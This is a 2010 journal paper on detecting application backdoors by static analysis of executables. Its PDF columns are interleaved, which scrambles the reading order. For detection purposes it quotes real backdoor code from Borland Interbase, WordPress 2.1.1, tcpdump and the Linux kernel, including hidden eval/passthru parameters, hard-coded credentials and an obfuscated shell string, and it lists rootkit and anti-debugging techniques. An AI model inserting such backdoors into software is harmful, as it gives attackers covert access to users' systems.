1. SCHWERPUNKT
Chris Wysopal, Chris Eng, Tyler Shields
Static Detection of Application
Backdoors
Detecting both malicious software behavior and malicious
indicators from the static analysis of executable code
Backdoors in legitimate software, whether maliciously inserted or carelessly introduced, are a
risk that should be detected prior to the affected software or system being deployed.
Automated static analysis of executable code can detect many classes of malicious behavior.
This paper will cover the techniques that can be employed to detect special credentials,
hidden commands, information leakage, rootkit behavior, anti-debugging, and time bombs.
Introduction ing for rootkit behavior and anti-debug-
ging functionality. If the analyzer finds
Backdoors in legitimate software, wheth- these “anti-reverse engineering” patterns,
Chris Wysopal er maliciously inserted or carelessly intro- further inspection should be performed to
duced, are a risk that should be detected determine what the software is hiding.
CTO and Co-
prior to the affected software or system be-
Founder of Vera-
ing deployed. We call software and devic-
code. He is vulnera-
bility researcher and
es that come with malicious functionality Technical Summary
built in, “Certified Pre-Owned”.
the author of „The
Modern static analysis methods can de- Backdoors are a method of bypassing au-
Art of Software Security Testing“
E-Mail: cwysopal@Veracode.com tect many classes of common vulnerabili- thentication or other security controls in
ties. Static analyzers do this by building a order to access a computer system or the
semantic model of the software which typ- data contained on that system. Backdoors
Chris Eng ically includes control flow and data flow can exist at the system level, in a crypto-
graphs. This model is then scanned for graphic algorithm, or within an applica-
Senior Director of patterns that typically lead to vulnerabili- tion. We have concentrated on application
Research at Vera- ties such as buffer overflows. Static analy- backdoors which are embedded within the
code. He is respon-
sis methods can also be targeted at detect- code of a legitimate application. We define
sible for integrating
ing code that offers backdoor functional- application backdoors as versions of legit-
security expertise
ity to an attacker who knows of its exis- imate software modified to bypass securi-
and prioritize the security feature set
tence. Binary static analysis has the pow- ty mechanisms under certain conditions.
of Veracode‘s service
erful capability of being able to use static These legitimate programs are meant to be
offerings.
E-Mail: ceng@Veracode.com analysis techniques when source code is installed and running on a system with
not available, which is the typical case the full knowledge and approval of the
when a consumer is concerned about de- system operator. Application backdoors
Tyler Shields tecting a backdoor in a product they have can result in the compromise of the data
purchased. and transactions performed by an applica-
Senior Researcher Special credentials, hidden commands, tion. They can also result in system com-
for the Veracode and unintended information leakage are a promise.
Research Team
few of the types of application backdoors Application backdoors are often insert-
whose responsibili-
that have been discovered in commercial ed in the code by someone who has legiti-
ties include under-
and open source software. Rules can be mate access to the code. Other times the
standing and ex-amining security
created for a static analyzer to inspect for source code or binary to an application is
and attack methods for integration
these patterns. Rules can also be created modified by someone who has compro-
into the Veracode products.
E-Mail: tshields@Veracode.com that inspect for evidence that someone is mised the system where the source code is
hiding functionality in software by look- maintained or the binary is distributed.
DuD • Datenschutz und Datensicherheit 3 | 2010 149

2. SCHWERPUNKT
Another method of inserting an applica- credential can be detected by looking for are in the form of a special username,
tion backdoor is to subvert the compiler, static or computed values that do not come password, password hash, or key. The log-
linker, or other components in the devel- from the authentication store yet allow au- ic is a comparison to the special credential
opment tool chain used to create the appli- thentication. or logic that inserts the special credential
cation binary from the source code. There are several categories of applica- into the designed credential store. An ob-
Application backdoors are best detected tion backdoors which can be detected us- fuscation technique for this class of back-
by inspecting the source code or statically ing automated static analysis: door is to compute the special credential
inspecting the binary. It is impossible to ƒ Special credentials from other data, either static or unique to
detect most types of application backdoors ƒ Unintended network activity the application installation [5].
dynamically because they use secret data ƒ Deliberate information leakage Example: Borland Interbase 4.0, 5.0, 6.0
or functionality that cannot be dynami- Other constructions in the code that indi- was discovered to have a special credential
cally inspected for. cate that a backdoor or other malicious backdoor in 2001 shortly after the soft-
Application backdoor analysis is imper- code is present can also be detected stati- ware was open sourced. The special cre-
fect. It is impossible to determine the in- cally. These include: dentials, username “politically” and pass-
tent of all application logic. Well known ƒ Embedded Shell Commands word “correct”, were inserted into the cre-
backdoor mechanisms can be heavily ob- ƒ Time Bombs dential table at program startup. The sup-
fuscated and novel mechanisms can cer- ƒ Rootkit-like Behavior port for user defined functions in the soft-
tainly be employed. Another angle of de- ƒ Code or Data Anomalies ware equated this backdoor access with
tection is to look for signs that the mali- ƒ Self-modifying Code system access. The backdoor went unde-
cious actor is trying to hide their tracks ƒ Anti-debugging tected for seven years.
with rootkit behavior, anti-debugging The design of a static binary analyzer to The following is the Borland Interbase
and/or code and data obfuscation tech- detect the preceeding consists of the fol- backdoor code:
niques. lowing processes:
In the past, backdoors in source code 1. Platform-Specific Front End – Prepare dpb = dpb _ string;
have been detected quickly but backdoors all symbol information, procedures, en- *dpb++ = gds _ _ dpb _ version1;
in binaries often survive detection for vironments, types, and other platform- *dpb++ = gds _ _ dpb _ user _ name;
years. The Linux kernel “uid=0” backdoor specific information for disassembly *dpb++ = strlen (LOCKSMITH _ US-
attempt was quickly discovered but the and transform. ER);
Borland Interbase backdoor lasted for 2. Data Flow Transformer – Disassemble q = LOCKSMITH _ USER;
many years until the software was open and import code. Convert low-level reg- while (*q) *dpb++ = *q++;
sourced. For compiled software, a subvert- ister accesses into high-level variables.
ed development tool chain or compro- Convert references to variable memory *dpb++ = gds _ _ dpb _ password _
mised distribution site requires binary locations into high level alias form. enc;
analysis for backdoor detection since the Propagate type information. strcpy (password _ enc,
backdoor only exists after compilation or 3. Optimization – Reduce complexity of (char *)ENC _ crypt(LOCKSMITH _
linking. In addition, modern development code by performing pattern-based and PASSWORD, PASSWORD _ SALT));
practices often dictate the usage of frame- dataflow-based reductions, propaga- q = password _ enc + 2;
works and libraries where only binary tions, substitutions and simplifications. *dpb++ = strlen (q);
code is available. When backdoor reviews 4. Control Flow Transformer – Recon- while (*q) *dpb++ = *q++;
are performed at the source code level struct high-level control flow from low-
there are still significant portions of soft- level jumps and conditionals. Trans- dpb _ length = dpb – dpb _ string;
ware that are not getting reviewed. For form ‘if/else’, ‘while/do/for’, ‘goto’, ‘try/
these reasons we have chosen to imple- throw/catch’, ‘switch’. isc _ attach _ database (status _
ment our static detection techniques on 5. Scan Process – Inspect the semantic vector, 0,
binary executables. model of the software for certain con- GDS _ VAL(name), &DB, dpb _
By researching backdoors that have structs such as vulnerabilities, weak- length,
been discovered, it is possible create rules nesses, and backdoors. dpb _ string);
for a static analyzer to inspect for back- 6. Reporting – Generate report of defects
door behavior. An example is a “special with their location in the code. A static analysis technique that would in-
credential” back door. This is when the dicate that there may be a backdoor in this
software has a special username, pass- example would be to inspect for usage of
word, password hash, or key that is em- Backdoor Detection the password crypt function that operated
bedded within the software. If an attacker Techniques on static data.
knows that special credential they can au- Additional examples of backdoors that
thenticate to the software no matter what Special Credentials use special credentials are [5], [6], and [7].
the contents of the authentication store. Detection Strategies: Identify static
The static analyzer can inspect the crypto Special credential backdoors are a class of variables that look like usernames or pass-
functions that are used by the authentica- application backdoor where the attacker words. Start with all static strings using
tion routine and the data flow graph that inserts logic and special credentials into the ASCII character set. Focus on string
connects to these function calls. A special the program code. The special credentials comparisons as opposed to assignments or
150 DuD • Datenschutz und Datensicherheit 3 | 2010

3. SCHWERPUNKT
placeholders. Also inspect known crypto Or in BSAFE: code. Hidden functionality is sometimes
API calls where these strings are passed in combined with a check for a special IP on
as plaintext data. B _ SetKeyInfo(B _ KEY _ OBJ the command issuer side so that there is
Identify static variables that look like keyObject, B _ INFO _ TYPE some protection against everyone using
hashes. Start with all static strings using infoType, POINTER info) the backdoor.
the character set [0-9A-Fa-f]. Narrow Example: In 2007 WordPress 2.1.1 was
down to strings that correspond to lengths Perform a statistical test for randomness backdoored [10]. A WordPress distribu-
of known hash algorithms such as MD5 on static variables. Data exhibiting high tion server was compromised and the dis-
(128 bits) or SHA1 (160 bits). Focus on entropy may be encrypted data or key ma- tribution modified to add a backdoor. Two
string comparisons as opposed to assign- terial and should be inspected further [8] PHP files were modified to allow remote
ments or placeholders. Examine cross-ref- [9]. command injection through a hidden pa-
erences to these strings. rameter in a web request. The modifica-
Identify static variables that look like Hidden Functionality tion was detected within one week.
cryptographic keys. Start with all static Shown below are the relevant portions
character arrays declared or dynamically Hidden functionality backdoors allow the of the PHP code that were inserted. It
allocated to a valid key length. Also iden- attacker to issue commands or authenti- reads the values of two parameters, “ix”
tify static character arrays that are a mul- cate without performing the designed au- and “iz”, from the web request and passes
tiple of a valid key length, which could be thentication procedure. Hidden function- those values into one of two built-in PHP
a key table. Narrow down to known cryp- ality backdoors often use special parame- functions, eval() or passthru(). The eval()
to API calls where these arrays are passed ters to trigger special logic within the pro- function processes the input string as PHP
in as the key parameter, for example in gram that shouldn’t be there. In web appli- code while passthru() executes a system
OpenSSL: cations these special parameters are often command.
invisible parameters for web requests (not
DES _ set _ key(const _ DES _ cblock to be confused with hidden fields). Other
*key, DES _ key _ schedule *schedule) hidden functionality includes undocu-
mented commands or left over debug
DuD • Datenschutz und Datensicherheit 3 | 2010 151

4. SCHWERPUNKT
function comment _ text _ or reads from a data structure containing str[0] = ‘0’;
phpfilter($filterdata) { valid commands. if (!(!buf || !*buf)) {
eval($filterdata); Identify comparisons with specific IP strcpy (str, buf);
} addresses or DNS names. In C, start with strcat (str, “ and “);
... all calls to socket API functions such as }
if ($ _ GET[„ix“]) { comment _ getpeername(), gethostbyname(), and strcat (str, new);
text _ phpfilter($ _ GET[„ix“]); } gethostbyaddr(). Comparisons against the buf = str;
results of these functions are suspicious. }
function get _ theme _ mcommand Don’t forget to look at ports as well.
($mcds) { passthru($mcds); This code inspects the user-supplied filter
} Unintended Network Activity parameter and modifies it as follows. If the
... user has explicitly specified port 1963, the
if ($ _ GET[„iz“]) { get _ theme _ Unintended network activity is a common backdoor will modify the filter to sniff
mcommand($ _ GET[„iz“]); } characteristic of backdoors. This may in- port 1964 instead. Otherwise, the string
volve a number of techniques, including “and not port 1963” is appended to the us-
A technique for discovering this particu- listening on undocumented ports, making er-selected filter. This is a crude technique
lar backdoor is no different than inspect- outbound connections to establish a com- and not particularly robust. For example,
ing code for command injection vulnera- mand and control channel, or leaking sen- if the filter had been “port 1963 or port 80”
bilities. First inspect for functions that call sitive information over the network via it would be rewritten as “port 1964”, and it
the operating system command shell and SMTP, HTTP, UDP, ICMP, or other pro- would be pretty obvious that something
then make sure no unfiltered user input is tocols. Any of these behaviors may be unusual was going on when no web traffic
passed to the function. combined with rootkit behavior in an at- was captured.
Additional examples of backdoors that tempt to hide the network activity from lo- This particular backdoor was atypical
use hidden functionality are [11], [12], [13], cal detection. because the C&C component depended on
and [14]. Example: In 2002, a backdoor was in- the build process to install itself as a sepa-
Detection Strategies: Recognize com- serted into the source code distribution of rate executable; however, the same func-
mon patterns in scripting languages: Cre- tcpdump [15], a common Unix-based net- tionality could have just as easily been em-
ate an obfuscated string, input into deob- work sniffer. The backdoor contained two bedded into the main tcpdump codebase.
fuscation function (commonly Base64), components, an outbound command and Additional examples of backdoors that
call eval() on the result of the deobfusca- control (C&C) channel in conjunction generate unintended network activity are
tion. Payload code often allows command with a modification to the sniffer itself to [16], [17], and [18].
execution or auth bypass. hide selected packets. The C&C compo- Detection Strategies: Backdoors that re-
The following Google Code Search que- nent was installed as a separate program ly on network behavior are most common-
ry will locate this common PHP obfusca- that is compiled and executed as part of ly detected dynamically using various net-
tion technique: the build process. When run, it established work utilities, both on the affected host
http://www.google.com/codesearch an TCP connection to a hard-coded IP ad- and upstream. However, static detection is
?hl=en&lr=&q=eval%5C%28base64 _ dress on port 1963 and listened for com- also possible if one understands the typi-
decode+file%3A%5C.php%24&btnG=Search mands, which were represented as single cal patterns of behavior. A benefit of stat-
characters – “A” to kill itself, “D” to spawn ic analysis for unintended network behav-
Identify GET or POST parameters parsed a shell and redirect I/O over the socket, ior detection is in cases where the back-
by web applications then compare them to and “M” to sleep for one hour. The sniffer door only exhibits the behavior at certain
form fields in HTML and JSP pages to find component modified tcpdump’s gencode.c times.
fields that only appear on the server side. file to modify the traffic filter as shown Identify inbound and outbound con-
Identify potential OS command injec- below: nections. Regardless of platform or lan-
tion vectors. In C, look for calls to the ex- guage, there are usually a set of standard
ec() family and system(). In PHP, use stan- int l; API functions responsible for handling
dard code review techniques such as look- char *port = “1963”; network communications. For C/C++
ing for popen(), system(), exec(), shell_ex- char *str, *tmp, *new = “not port programs on Unix platforms these reside
ec(), passthru(), eval(), backticks, fopen(), 1963”; in the libc package; Windows supports
include(), or require(). Then analyze data these as well but extends them with
flow to check for tainted parameters. if (buf && *buf && strstr (buf, Win32-specific APIs. Start by identifying
Identify static variables that look like port)) { all locations in the codebase that call func-
application commands. Start with all stat- buf = “port 1964”; tions responsible for establishing connec-
ic strings using the ASCII character set } else { tions or sending/receiving connectionless
(depending on the protocol, hidden com- l = strlen (new) + 1; data, such as connect(), bind(), accept(),
mands might not be human-readable if (!(!buf || !*buf)) { sendto(), listen() and recvfrom(). Once
text). Focus on string comparisons as op- l += strlen (buf); these calls have been identified, pay par-
posed to assignments or placeholders. l += 5; /* and */ ticular attention to any outbound network
Check the main command processing } activity that reference a hard-coded IP ad-
loop(s) to see if it uses direct comparisons str = (char *)malloc (l); dress or port. For anything that looks sus-
152 DuD • Datenschutz und Datensicherheit 3 | 2010

5. SCHWERPUNKT
picious, analyze the data flow to deter- Manipulation of Security-Critical havioral patterns rather than the variables
mine what type of information is being Parameters themselves.
sent out. For inbound activity, some Take the Linux backdoor attempt as an
knowledge of the normal application traf- In any program, certain variables or pa- example. In order to be subtle, the attack-
fic will be required to determine which rameters are more significant than others er disguised a backdoor as a common pro-
ports are unauthorized listeners. A J2EE from a security standpoint. In operating gramming flaw, using an assign instead of
application server, for example, opens a system code, these could be parameters a compare. Static analysis could be used to
number of ports for backend communica- that assign certain privileges to a process, identify all instances of this behavior and
tion. Keep in mind that many applications influence task scheduling, or restrict op- then inspect each one manually. The scan
have functionality built in to automatical- erations on memory pages. In application would need to be tuned to take into ac-
ly check for updates, so seeing at least one code, consider variables used to store the count situations where an assignment
hard-coded outbound connection is not results of authentication or authorization within a conditional is intended, since this
uncommon. functions, or other security mechanisms. is a common idiom in C/C++. For exam-
Identify potential information leaks. In By directly manipulating these parame- ple:
addition to the obvious step of examining ters or introducing flawed logic to com-
filesystem and registry I/O, cryptograph- parisons against them, an attacker may be if ((foo == 1) && (bar = malloc
ic APIs can be a useful starting point to able to disrupt the program in a way that (BAR _ SIZE)) { do _ something _
identify locations where sensitive data may is advantageous to someone who under- useful();
reside. Start by identifying all locations stands how to trigger it. }
where known cryptographic APIs are Example: In 2003, an attempt was made
used. For example, a program that uses the to backdoor the Linux 2.6 kernel [2]. The In this case, the assignment in the condition-
OpenSSL implementation of Blowfish maintainers noticed and removed the al is used to check the return value of mal-
should call BF_set_key() to initialize the backdoor before end users were ever af- loc(), which is NULL on failure. The scan
encryption key and either BF_cbc_en- fected. This was due in part to the fact that could be refined by only flagging condition-
crypt() or one of the other BF_ functions the attacker directly modified the CVS als contains an assignment where the right-
to encrypt/decrypt data. Within these tree rather than committing a change via hand side is either a constant or a function
function calls, determine which parame- the usual mechanism. Even though the that always returns the same value.
ters contain sensitive data such as keys or malicious code never made it to a shipping It could also be useful to examine logic
plaintext data. Then, analyze the data kernel, it provided valuable insight into a expressions in security-critical sections or
flows for these variables to locate other very subtle backdoor technique. The code expressions that reference security-related
places in the code where they are refer- snippet show here is all that was added to API calls. Short-circuited compound con-
enced. Certain use cases are safe, for ex- the sys_wait4() function of kernel/exit.c: ditionals or expressions that always evalu-
ample, strlen(), bzero(), and memset(). ate to the same value should be examined
However, if these pieces of data are passed if ((options == ( _ _ WCLONE| _ _ in more detail. An example of the latter
into network functions or even file I/O, WALL)) && case, as seen in a recent vulnerability in the
further exploration may be warranted. (current->uid = 0)) X.Org Window Server [19], is shown here:
Profile binaries by examining import retval = -EINVAL;
tables. Source code may not always be if (getuid() == 0 || geteuid != 0)
available. However, it is still possible to ap- The intended functionality of the wait4() {
ply static analysis techniques to under- system call is to allow the caller to wait on if (!strcmp(argv[i],
stand the application profile. Compiled a specified child process to change state. “-modulepath”)) {
applications contain import tables which At first glance, this modification appears /* allow arbitrary
inform the process at run-time where to to simply abort the system call if the pro- modules */
find the implementation of library func- cess has certain flags set and is running as }
tions. A variety of open-source or freeware root. However, upon closer examination, }
tools can be used to parse import tables the second half of the conditional actual- While the intention of the conditional is to
and display a list of the imported func- ly assigns current->uid to zero rather than only process the -modulepath option if the
tions. Some popular tools are readelf, ob- comparing it with zero. As a result, the user is root or the process is running as a
jdump, and nm on Unix platforms, or PE- calling process is granted root privileges if non-root user, the expression is flawed be-
Dump and PEBrowse on Windows plat- it calls wait4() with the _WCLONE and _ cause it uses the geteuid function pointer
forms. WALL options set. rather than the return value of geteuid().
The purpose of profiling is simply to Detection: This is a difficult category to This is a scenario where the second half of
identify anomalies, such as the use of net- detect, partly due to the vast number of se- the expression would always evaluate to
work APIs by an application that should curity-critical parameters to consider. true because the geteuid function would
be client-side only, such as a text editor. If One technique would be to create a list of never be loaded at memory address 0. It is
anomalies are found, then proceed to an- these “interesting” variables and examine likely that this example was an implemen-
alyze the binary in more depth, using a each and every reference. However, this is tation vulnerability rather than a back-
disassembler to trace the code paths to the likely to be too time-consuming. It may door, though there is no way to be certain.
suspicious calls. make more sense to focus on known be- Interestingly, both the Linux kernel and
X.Org examples should be detectable by
DuD • Datenschutz und Datensicherheit 3 | 2010 153

6. SCHWERPUNKT
relatively unsophisticated source code behavior is a backdoor that opens up a net- Anti-Debugging
scanners. In fact, they may even be flagged work port listening for incoming connec-
by the compiler, if warnings are not sup- tions and also modifies the OS functions Anti-debugging is the implementation of
pressed. that list listening network ports. Anti-de- one or more techniques within computer
bugging is an approach that makes run- code that hinders attempts at reverse engi-
Additional Detection Techniques time inspection of the running code diffi- neering or debugging a target binary.
cult. If the backdoored software can stop These techniques are used by commercial
There are a number of other suspicious be- a debugger from single stepping through executable protectors, packers, and mali-
haviors that may be indicative of applica- the code or inspecting internal data struc- cious software, to prevent or slow-down
tion backdoors but either do not fall into tures it makes it difficult to determine if the process of reverse-engineering. Scans
any of the previously described categories the software has unwanted backdoor can be implemented for generic and tar-
or could potentially span multiple catego- functionality at execution time. Time geted anti-debugging and anti-tracing
ries. These may include embedded shell bombs thwart dynamic analysis be trig- techniques.
commands, time bombs, rootkit-like be- gering malicious behavior at a particular The most straightforward method of
havior, self-modifying code, code or data absolute time such as on the 15th day of anti-debugging uses operating system
anomalies, and Linux-specific network fil- the month or on an interval such as week- provided API functions to determine the
ters. ly. Dynamic analysis has to occur over an existence or operation of a debugger. Some
exceedingly long period to detect a time of the API calls are documented features
Embedded Shell Commands bomb. provided by the operating system itself,
One of the solutions to this challenge we while others are unpublished functions
This is an obvious technique but surpris- propose is to look directly for the code that that can be linked at runtime from various
ingly effective. Simply grep through implements the anti-debugging, rootkit be- system DLL files. Other anti-debugging
source files or run ‘strings’ or a similar havior, or time bomb using static analysis. techniques that can be scanned for in-
utility against the compiled binary to lo- clude:
cate any hard-coded instances of ASCII Rootkit Behavior ™ FindWindow
strings such as “/bin/sh”, “/bin/ksh”, “/bin/ ™ Debugger Registry Key Detection
csh”, etc. One benefit of scanning the bi- The following are some common tech- ™ ProcessDebugPort Detection
nary in this case is that character arrays niques that rootkits use to hide their be- ™ Debugger Detaching
are more readable. Consider this fragment havior from the instrumentation a reverse ™ Self-Debugging
of source code: engineer or system administrator might ™ ProcessDebugFlags
use. These techniques include: DLL injec- ™ ProcessDebugObjectHandle
static char cmd[] = tion, IAT hooking, and Inline function ™ INT 2D Debugger Detection
“x2fx62x69x6e” hooking. A scan rule can be created for ™ INT3 Exception Detection
“x2fx73x68”; each coding patterns such that a static an- ™ Single Step Detection
alyzer can search for the pattern in the ™ Ctrl-C Vectored Exception Handling
When the hex characters are interpreted, code. ™ ICE Breakpoint 0xF1
the string is simply “/bin/sh”. However, a DLL Injection can be used for many le- ™ VMware Detection
scan of source code might not pick this up gitimate purposes; however its usage is a [27][28][29][30][31]
if it was searching for the ASCII represen- red flag that should cause the application
tation. Other methods of hiding embed- metadata to be analyzed. If the scanned Time Bombs
ded command strings from the casual ob- application is intended to inject DLLs into
server include simple obfuscation such as external processes then there is a chance A time bomb or logic bomb may be used
Base64, Uuencode, ROT-N, or XOR. these are false positive returns; however if by a backdoor to initiate a malicious action
the scanned application should not be ex- at a certain time, or when certain condi-
ecuting DLL injection of any manner, pos- tions are met. Time bombs can usually be
Looking for Backdoor itive hits on these scan tests are highly detected by examining calls to standard
Indicators likely to be indicative of a rootkit or sub- date/time API functions, such as time(),
versive function. The following are some ctime(), gmtime(), localtime(), or their
Backdoor indicators are evidence that the techniques of DLL injection that can be thread-safe variants. Again, the Win32
software is trying to hide its behavior from detected: and other platform APIs provide a num-
dynamic run time detection. ™ Via the Registry ber of additional date/time functions.
Three categories of backdoor indicators ™ Using Windows Hooks Once calls to these functions have been
that are designed to evade detection by ™ Using Remote Threads identified, analyze how the results are be-
run time analysis are rootkit behavior, an- ™ Thread Suspend and Hijack ing used to determine if certain values re-
ti-debugging, and time bombs. Rootkit ™ IAT Hooking sult in different code paths.
behavior modifies the operations of the ™ Inline Function Hooking Keep in mind that most of the time,
operating system the software is running [20][21][22][23][24][25][26] these functions will be called for either
on so that instrumentation and system ad- logging purposes, execution time calcula-
ministration tools cannot detect the back- tions, or simply to generate protocol time-
door functionality. An example of rootkit stamps. For example, HTTP includes the
154 DuD • Datenschutz und Datensicherheit 3 | 2010

7. SCHWERPUNKT
[15] Various, “Latest libpcap & tcpdump sources
current system time in every server-gen- could be compromised but your scanner
from tcpdump.org contain a Trojan”, Houston
erated response. It is branching based on as well. Linux Users Group, http://www.hlug.org/tro-
the absolute time or a time difference that jan/, Nov. 2002.
is suspicious. [16] Ercoli, Luca, “Etomite Content Management
References System security advisory”, http://www.lucaer-
coli.it/advs/etomite.txt, Jan. 2006.
Conclusion [1] Thompson, Ken, “Reflections on Trusting
Trust”, Communication of the ACM Vol. 27,
[17] US-CERT, “CERT® Advisory CA-2002-24 Trojan
Horse OpenSSH Distribution”, US-CERT Vul-
No. 8, http://www.acm.org/classics/sep95/, nerability Database, http://www.cert.org/
Application backdoors do not require Sep. 1995. advisories/CA-2002-24.html, Aug. 2002.
much sophistication to create and there is [2] Andrews, Jeremy, “Linux: Kernel ‚Back Door‘ [18] Song, Dug, “Trojan/backdoor in fragroute 1.2
ample motivation for bad actors to create Attempt”, KernelTrap, http://kerneltrap.org/ source distribution”, Virus.Org Mailing List Ar-
them. Backdoors are trivial to exploit once node/1584, Nov. 2003. chive, http://lists.virus.org/bugtraq-0205/
the word gets out so response must be very [3] Poulsen, Kevin, “Borland Interbase backdoor msg00276.html, May 2002.
quick. The negative reputation impact to exposed”, The Register, http://www.theregis- [19] Various, “X.Org X Window Server Local Privi-
ter.co.uk/2001/01/12/borland_interbase_ lege Escalation Vulnerability”, Security Focus,
the vendor of the effected software is often
backdoor_exposed, Jan. 2001. http://www.securityfocus.com/archive/1/ar-
much higher than the negative impact [4] Reifer Consultants presentation at Oct 2007 chive/1/428183/100/0/threaded, Mar. 2006.
from a typical vulnerability. A vulnerabil- DHS SwA Forum [20] Marsh, Kyle, “Win32 Hooks”, Microsoft Devel-
ity is perceived as a mistake but losing con- [5] Oblivion, Brian, “NetStructure 7110 console oper Network, http://msdn2.microsoft.com/
trol of one’s development or distribution backdoor”, Bugtraq mailing list, http://se- en-us/library/ms997537.aspx, Feb. 1994.
environment is thought to be incompe- clists.org/bugtraq/2000/May/0114.html, May [21] Ivanov, Ivo, “API Hooking Revealed”, The Code
tence. 2000. Project, http://www.codeproject.com/sys-
[6] Cerberus Security Team, “Cart32 secret pass- tem/hooksys.asp, Dec. 2002.
The list of techniques a programmer
word backdoor”, Neohapsis Archives, http:// [22] SysSpider, “The Win32 API For Hackers”, http://
can use to hide from runtime analysis con- archives.neohapsis.com/archives/ sysspider.vectorstar.net/papers/api4hackers.
tinues to grow as new methods are found win2ksecadvice/2000-q2/0048.html, Apr. txt, unknown date.
over time. Like most areas of security re- 2000. [23] Butler, James, “VICE – Catch the Hookers”,
search this is a classic cat and mouse game. [7] Tarbatt, Dave, “APC 9606 SmartSlot Web/ BlackHat USA 2004, http://www.blackhat.
Rootkit techniques are a fertile ground of SNMP Management Card Backdoor”, Secu- com/presentations/bh-usa-04/bh-us-04-but-
research and new operating systems and riTeam Security News, http://www.securite- ler/bh-us-04-butler.pdf, Aug. 2004.
VMs give additional debugging opportu- am.com/securitynews/5MP0E2AC0M.html, [24] Kruegel, Christopher et al, “Detecting Kernel-
Feb. 2004. Level RootkitsThrough Binary Analysis”, 20th
nities that the ant-reverse engineer will
[8] Lyda, Robert et al, “Using Entropy Analysis to Annual Computer Security Applications
want to thwart. The list is long and grow- Find Encrypted and Packed Malware”, IEEE Se- Conference, http://www.cs.ucsb.edu/~wkr/
ing. However, when a new technique is curity and Privacy, http://csdl2.computer.org/ publications/acsac04lkrm.pdf, May 2004.
discovered it is relatively easy to add a scan persagen/DLAbsToc.jsp?resourcePath=/dl/ [25] Bioforge, “Hacking the Linux Kernel Network
or check for the pattern with a rules based mags/sp/&toc=comp/mags/sp/2007/02/ Stack”, Phrack Magazine Issue 61, http://
static analyzer. Binary static analysis is up j2toc.xml&DOI=10.1109/MSP.2007.48, Apr. www.phrack.org/issues.
to the task of looking for the tell tale signs 2007. html?issue=61&id=13, Aug. 2003.
[9] Carrera, Ero, “Scanning data for entropy [26] Rutkowska, Joanna, “Linux Kernel Backdoors
that a program is trying to hide its behav-
anomalies”, nzight blog, http://blog.dkbza. And Their Detection”, IT Underground 2004,
ior from a reverse engineer which is often org/2007/05/scanning-data-for-entropy- http://invisiblethings.org/papers/ITUnder
a tip off that something unwanted is hid- anomalies.html, May 2007. ground2004_Linux_kernel_backdoors.ppt,
den in the software. [10] Boren, Ryan, “WordPress source code com- Oct. 2004.
These factors add up to a need for soft- promised to enable remote code execution”, [27] Danny Quist and Val Smith, http://www.of-
ware developers to become apprised of LWN.net, http://lwn.net/Articles/224999/, fensivecomputing.net/files/active/0/vm.pdf
backdoor techniques and to expend re- Mar. 2007. [28] Josh Jackson, http://www.codeproject.com/
sources on backdoor detection. We rec- [11] US-CERT, “CERT® Advisory CA-1994-14 Trojan KB/security/AntiReverseEngineering.aspx,
Horse in IRC Client for UNIX”, US-CERT Vulner- Nov. 2008
ommend that developers scan the code
ability Database, http://www.cert.org/advi- [29] Nicolas Falliere, http://www.securityfocus.
they are developing or maintaining before sories/CA-1994-14.html, Oct. 1994. com/infocus/1893, Sept. 2007
release. Binary code, whether a standalone [12] Heise Security News, “Backdoor in Artmedic [30] Michael N. Gagnon et al, http://ieeexplore.
application or a library that is linked into CMS”, http://www.heise-security.co.uk/ ieee.org/Xplore/login.jsp?url=/
an application should be scanned for back- news/89835, May 2007. iel5/8013/4218538/04218560.pdf?temp=x,
doors as part of the acceptance testing [13] Zielinski, Mark, “ID games Backdoor in quake”, June 2007
process. Finally, as no discussion of back- insecure.org, http://insecure.org/sploits/ [31] Nicolas Brulez, http://www.codebreakers-
quake.backdoor.html, May 1998. journal.com/downloads/cbj/2005/
doors would be complete without follow-
[14] Various, “TCP Wrapper Backdoor Vulnerabili- CBJ_2_1_2005_Brulez_Anti_Reverse_Engi-
ing the advice of Ken Thompson’s classic ty”, Security Focus, http://www.securityfocus. neering_Uncovered.pdf, March 2005
paper, “Reflections on Trusting Trust” [1], com/bid/118/discuss, Jan. 1999.
scan your binaries using an independent
trusted scanner as not only your tool chain
DuD • Datenschutz und Datensicherheit 3 | 2010 155